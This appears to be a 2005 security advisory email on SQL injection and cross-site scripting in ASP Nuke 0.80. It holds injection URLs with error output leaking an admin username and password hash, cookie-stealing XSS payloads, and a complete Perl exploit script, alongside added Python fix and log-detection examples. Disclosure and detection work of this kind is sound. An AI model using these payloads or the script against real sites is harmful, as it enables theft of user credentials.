From: SecuriTeam <support@securiteam.com>
To: [email protected]
Date: 25 Apr 2005 15:11:31 +0200
Subject: [NT] ASP Nuke Multiple SQL Injection and XSS Vulnerability
Message-Id: <20050425122708.CB15357F3@mail.tyumen.ru>
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
ASP Nuke Multiple SQL Injection and XSS Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.aspnuke.com/> ASP Nuke is "an open-source software
application for running a community-based web site on a web server".
Several ASP Nuke pages use request parameters without filtering them. This
allows attackers to view, modify, add or delete information in ASP Nuke's
database, and to inject script into pages that reflect those parameters
(cross site scripting).
DETAILS
Vulnerable Systems:
* ASP Nuke version 0.80
SQL Injection:
ASP Nuke has many pages that are vulnerable to SQL injection; three of them
are shown below. In each case a numeric ID parameter is placed into the
query without quoting or validation.
Example #1:
The following URL can be used to trigger an SQL injection vulnerability in
the comments.asp page:
http://localhost/module/support/task/comments.asp?taskid='SQL_INJECTION
SQL INJECTION
Error # -2147217900 (0x80040E14)
Unclosed quotation mark before the character string 'SQL_INJECTION AND
tsk.Active <> 0 AND tsk.Archive = 0'.
SELECT tsk.TaskID, tsk.Title, tsk.Comments, tsk.PctComplete,
usr.FirstName, usr.LastName, pri.PriorityName, sta.StatusName, 0 As
CommentCount, tsk.Created FROM tblTask tsk INNER JOIN tblUser usr ON
tsk.UserID = usr.UserID INNER JOIN tblTaskPriority pri ON pri.PriorityID =
tsk.PriorityID INNER JOIN tblTaskStatus sta ON sta.StatusID = tsk.StatusID
WHERE tsk.TaskID = 'SQL_INJECTION AND tsk.Active <> 0 AND tsk.Archive = 0
Exploit:
To get the username:
http://localhost/module/support/task/comments.asp?taskid=Username--
This would result in:
Error # -2147217913 (0x80040E07)
Syntax error converting the varchar value 'admin' to a column of data type
int.
SELECT tsk.TaskID, tsk.Title, tsk.Comments, tsk.PctComplete,
usr.FirstName, usr.LastName, pri.PriorityName, sta.StatusName, 0 As
CommentCount, tsk.Created FROM tblTask tsk INNER JOIN tblUser usr ON
tsk.UserID = usr.UserID INNER JOIN tblTaskPriority pri ON pri.PriorityID =
tsk.PriorityID INNER JOIN tblTaskStatus sta ON sta.StatusID = tsk.StatusID
WHERE tsk.TaskID = Username-- AND tsk.Active <> 0 AND tsk.Archive = 0
With "admin" being the username. The column name injected in place of the
numeric TaskID is resolved against the joined tblUser table, and SQL Server
discloses the column's value when its varchar-to-int conversion fails.
To get the password:
http://localhost/module/support/task/comments.asp?taskid=Password--
This would result in:
Error # -2147217913 (0x80040E07)
Syntax error converting the varchar value
'f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015' to a
column of data type int.
SELECT tsk.TaskID, tsk.Title, tsk.Comments, tsk.PctComplete,
usr.FirstName, usr.LastName, pri.PriorityName, sta.StatusName, 0 As
CommentCount, tsk.Created FROM tblTask tsk INNER JOIN tblUser usr ON
tsk.UserID = usr.UserID INNER JOIN tblTaskPriority pri ON pri.PriorityID =
tsk.PriorityID INNER JOIN tblTaskStatus sta ON sta.StatusID = tsk.StatusID
WHERE tsk.TaskID = Password-- AND tsk.Active <> 0 AND tsk.Archive = 0
With "f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015"
being the SHA-256 hash of the password.
Example #2:
The following URL can be used to trigger an SQL injection vulnerability in
the detail.asp page:
http://localhost/module/support/task/detail.asp?taskid='SQL_INJECTION
SQL INJECTION
Error # -2147217900 (0x80040E14)
Unclosed quotation mark before the character string 'SQL_INJECTION AND
tsk.Active <> 0 AND tsk.Archive = 0'.
SELECT tsk.TaskID, tsk.Title, tsk.Comments, usr.FirstName, usr.LastName,
pri.PriorityName, sta.StatusName, 0 As CommentCount, tsk.Created FROM
tblTask tsk INNER JOIN tblUser usr ON tsk.UserID = usr.UserID INNER JOIN
tblTaskPriority pri ON pri.PriorityID = tsk.PriorityID INNER JOIN
tblTaskStatus sta ON sta.StatusID = tsk.StatusID WHERE tsk.TaskID =
'SQL_INJECTION AND tsk.Active <> 0 AND tsk.Archive = 0
Exploit:
To get the username:
http://localhost/module/support/task/detail.asp?taskid=Username--
This would result in:
Error # -2147217913 (0x80040E07)
Syntax error converting the varchar value 'admin' to a column of data type
int.
SELECT tsk.TaskID, tsk.Title, tsk.Comments, usr.FirstName, usr.LastName,
pri.PriorityName, sta.StatusName, 0 As CommentCount, tsk.Created FROM
tblTask tsk INNER JOIN tblUser usr ON tsk.UserID = usr.UserID INNER JOIN
tblTaskPriority pri ON pri.PriorityID = tsk.PriorityID INNER JOIN
tblTaskStatus sta ON sta.StatusID = tsk.StatusID WHERE tsk.TaskID =
Username-- AND tsk.Active <> 0 AND tsk.Archive = 0
With "admin" being the username
To get the password:
http://localhost/module/support/task/detail.asp?taskid=Password--
This would result in:
Error # -2147217913 (0x80040E07)
Syntax error converting the varchar value
'f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015' to a
column of data type int.
SELECT tsk.TaskID, tsk.Title, tsk.Comments, usr.FirstName, usr.LastName,
pri.PriorityName, sta.StatusName, 0 As CommentCount, tsk.Created FROM
tblTask tsk INNER JOIN tblUser usr ON tsk.UserID = usr.UserID INNER JOIN
tblTaskPriority pri ON pri.PriorityID = tsk.PriorityID INNER JOIN
tblTaskStatus sta ON sta.StatusID = tsk.StatusID WHERE tsk.TaskID =
Password-- AND tsk.Active <> 0 AND tsk.Archive = 0
With "f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015"
being the SHA-256 hash of the password.
Example #3:
The following URL can be used to trigger an SQL injection vulnerability in
the article.asp page:
http://localhost/module/article/article/article.asp?articleid='SQL_INJECTION
SQL INJECTION
Error # -2147217900 (0x80040E14)
Unclosed quotation mark before the character string 'SQL_INJECTION AND
art.Active <> 0 AND art.Archive = 0'.
SELECT art.ArticleID, art.Title, art.ArticleBody, auth.FirstName,
auth.LastName, cat.CategoryName, art.CommentCount, art.Created FROM
tblArticle art INNER JOIN tblArticleAuthor auth ON art.AuthorID =
auth.AuthorID INNER JOIN tblArticleToCategory atc ON atc.ArticleID =
art.ArticleID INNER JOIN tblArticleCategory cat ON atc.CategoryID =
cat.CategoryID WHERE art.ArticleID = 'SQL_INJECTION AND art.Active <> 0
AND art.Archive = 0
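To show the defect behind these error messages and its fix, here is an added example (not ASP Nuke's code) in Python with an in-memory SQLite stand-in for tblTask: the vulnerable builder concatenates taskid exactly as comments.asp does, so a trailing "--" comments out the Active/Archive filters, while the hardened version validates the value as an integer and binds it as a parameter. SQLite is assumed in place of SQL Server, so the varchar-to-int error is not reproduced, only the comment-out of the filters.

```python
import re
import sqlite3

# Constructed stand-in for ASP Nuke's tblTask (column names taken from the
# advisory's query); SQLite replaces SQL Server here, so the varchar-to-int
# conversion error is not reproduced, only the comment-out of the filters.
SCHEMA = """
CREATE TABLE tblTask (TaskID INTEGER PRIMARY KEY, Title TEXT,
                      Active INTEGER, Archive INTEGER);
INSERT INTO tblTask VALUES (1, 'Archived task', 1, 1);
INSERT INTO tblTask VALUES (2, 'Open task', 1, 0);
"""

def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def vulnerable_query(taskid):
    # Mirrors comments.asp: the raw taskid is pasted into the WHERE clause with
    # no quoting and no validation, so whatever follows it is parsed as SQL.
    return ("SELECT tsk.TaskID, tsk.Title FROM tblTask tsk WHERE tsk.TaskID = "
            + taskid + " AND tsk.Active <> 0 AND tsk.Archive = 0")

def fetch_vulnerable(conn, taskid):
    return conn.execute(vulnerable_query(taskid)).fetchall()

def fetch_safe(conn, taskid):
    # Hardened form: accept only a plain integer, then bind it as a parameter
    # so the driver never treats the value as SQL text.
    if not re.fullmatch(r"\d{1,9}", taskid):
        raise ValueError("taskid must be a positive integer")
    sql = ("SELECT tsk.TaskID, tsk.Title FROM tblTask tsk WHERE tsk.TaskID = ? "
           "AND tsk.Active <> 0 AND tsk.Archive = 0")
    return conn.execute(sql, (int(taskid),)).fetchall()
```

With taskid "1--" the vulnerable path returns the archived task because the guard clauses are commented out; the safe path rejects the same input before any SQL is built.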
Cross Site Scripting:
The following URLs can be used to trigger the cross site scripting
vulnerabilities found in the profile.asp and select.asp pages, which reflect
the username and code parameters into the page unfiltered:
http://localhost/module/discuss/forum/profile.asp?topicid=1&thradid=346&username='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://localhost/module/support/language/select.asp?code='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
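For detection, here is an added example (not part of the advisory) that scans constructed IIS-style log lines for requests to the pages and parameters named above: integer parameters that are not numeric, quote or comment characters in the watched parameters, and script markup in the reflected ones. The log field order is an assumption stated in the code.

```python
import re
from urllib.parse import parse_qs

# Pages and parameters named in the advisory as unfiltered in ASP Nuke 0.80.
WATCHED = {
    "/module/support/task/comments.asp": ("taskid",),
    "/module/support/task/detail.asp": ("taskid",),
    "/module/article/article/article.asp": ("articleid",),
    "/module/discuss/forum/profile.asp": ("username",),
    "/module/support/language/select.asp": ("code",),
}
INT_PARAMS = {"taskid", "articleid"}   # legitimate values are plain integers
SCRIPT_MARKUP = re.compile(r"<\s*/?\s*script|javascript:", re.IGNORECASE)

def classify_query(stem, query):
    """Return (param, reason) findings for one request to a watched page."""
    findings = []
    for param in WATCHED.get(stem.lower(), ()):
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            if param in INT_PARAMS and not re.fullmatch(r"\d{1,9}", value):
                findings.append((param, "non-numeric value in integer parameter"))
            elif "'" in value or "--" in value:
                findings.append((param, "SQL metacharacters"))
            if SCRIPT_MARKUP.search(value):
                findings.append((param, "script markup"))
    return findings

def scan_log(lines):
    """Scan IIS W3C-style lines (assumed field order: date time c-ip cs-method
    cs-uri-stem cs-uri-query sc-status); parse_qs decodes the %xx escapes."""
    hits = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        _date, _time, ip, _method, stem, query, _status = fields[:7]
        for param, reason in classify_query(stem, "" if query == "-" else query):
            hits.append((ip, stem, param, reason))
    return hits

# Constructed sample log in the assumed field order (not real ASP Nuke traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-04-25 10:00:01 10.0.0.5 GET /module/support/task/comments.asp taskid=12 200
2005-04-25 10:00:07 10.0.0.9 GET /module/support/task/comments.asp taskid=Password-- 500
2005-04-25 10:00:12 10.0.0.9 GET /module/article/article/article.asp articleid='SQL_INJECTION 500
2005-04-25 10:00:20 10.0.0.9 GET /module/discuss/forum/profile.asp topicid=1&thradid=346&username='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 200
""".splitlines()
```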
Exploit (Username and Password retrieval):
#!/usr/bin/perl
# Diabolic Crab's original script, reflowed: the request strings that had
# been wrapped across two lines are restored to single lines.
use IO::Socket;
use Getopt::Std;
print "[x]ASP NUKE 0.80 and below Comments.asp Sql Injection Exploit\n";
print "[x]By Diabolic Crab\n";
print "[x]http://www.digitalparadox.org\n\n";
getopt("h:p:");
$opt_p ||= 80;
if(!$opt_h) {
die("[x] Usage: $0 -h <host> [-p <port>]\n");
}
# Request lines for the two comments.asp queries shown in Example #1.
$sqlpass = "/module/support/task/comments.asp?taskid=Password-- HTTP/1.0\n";
$sqllogin = "/module/support/task/comments.asp?taskid=Username-- HTTP/1.0\n";
print "[x] Host: $opt_h\n";
print "[x] Port: $opt_p\n";
$Q1 = "GET $sqllogin";
$Q1 .= "Host: ".$opt_h."\n\n";
$Q2 = "GET $sqlpass";
$Q2 .= "Host: ".$opt_h."\n\n";
# One connection per request; only the first 1024 bytes of each reply are read.
$s = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $opt_h, PeerPort => $opt_p) or die("Can't connect!");
$s->send($Q1);
$s->recv($usr, 1024);
$s = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $opt_h, PeerPort => $opt_p) or die("Can't connect!");
$s->send($Q2);
$s->recv($pass, 1024);
# The leaked value is the first single-quoted string in the error text.
$s = index($usr,"'");
$e = index($usr,"'", $s + 1);
$f = $e - $s - 1;
print "[x]Username is: ";
print substr($usr, $s + 1, $f);
print "\n";
$s = index($pass,"'");
$e = index($pass,"'", $s + 1);
$f = $e - $s - 1;
print "[x]Password hash in SHA 256 is: ";
print substr($pass, $s + 1, $f);
print "\n";
#EOF
ADDITIONAL INFORMATION
The information has been provided by <mailto:dcrab@hackerscenter.com> Diabolic Crab.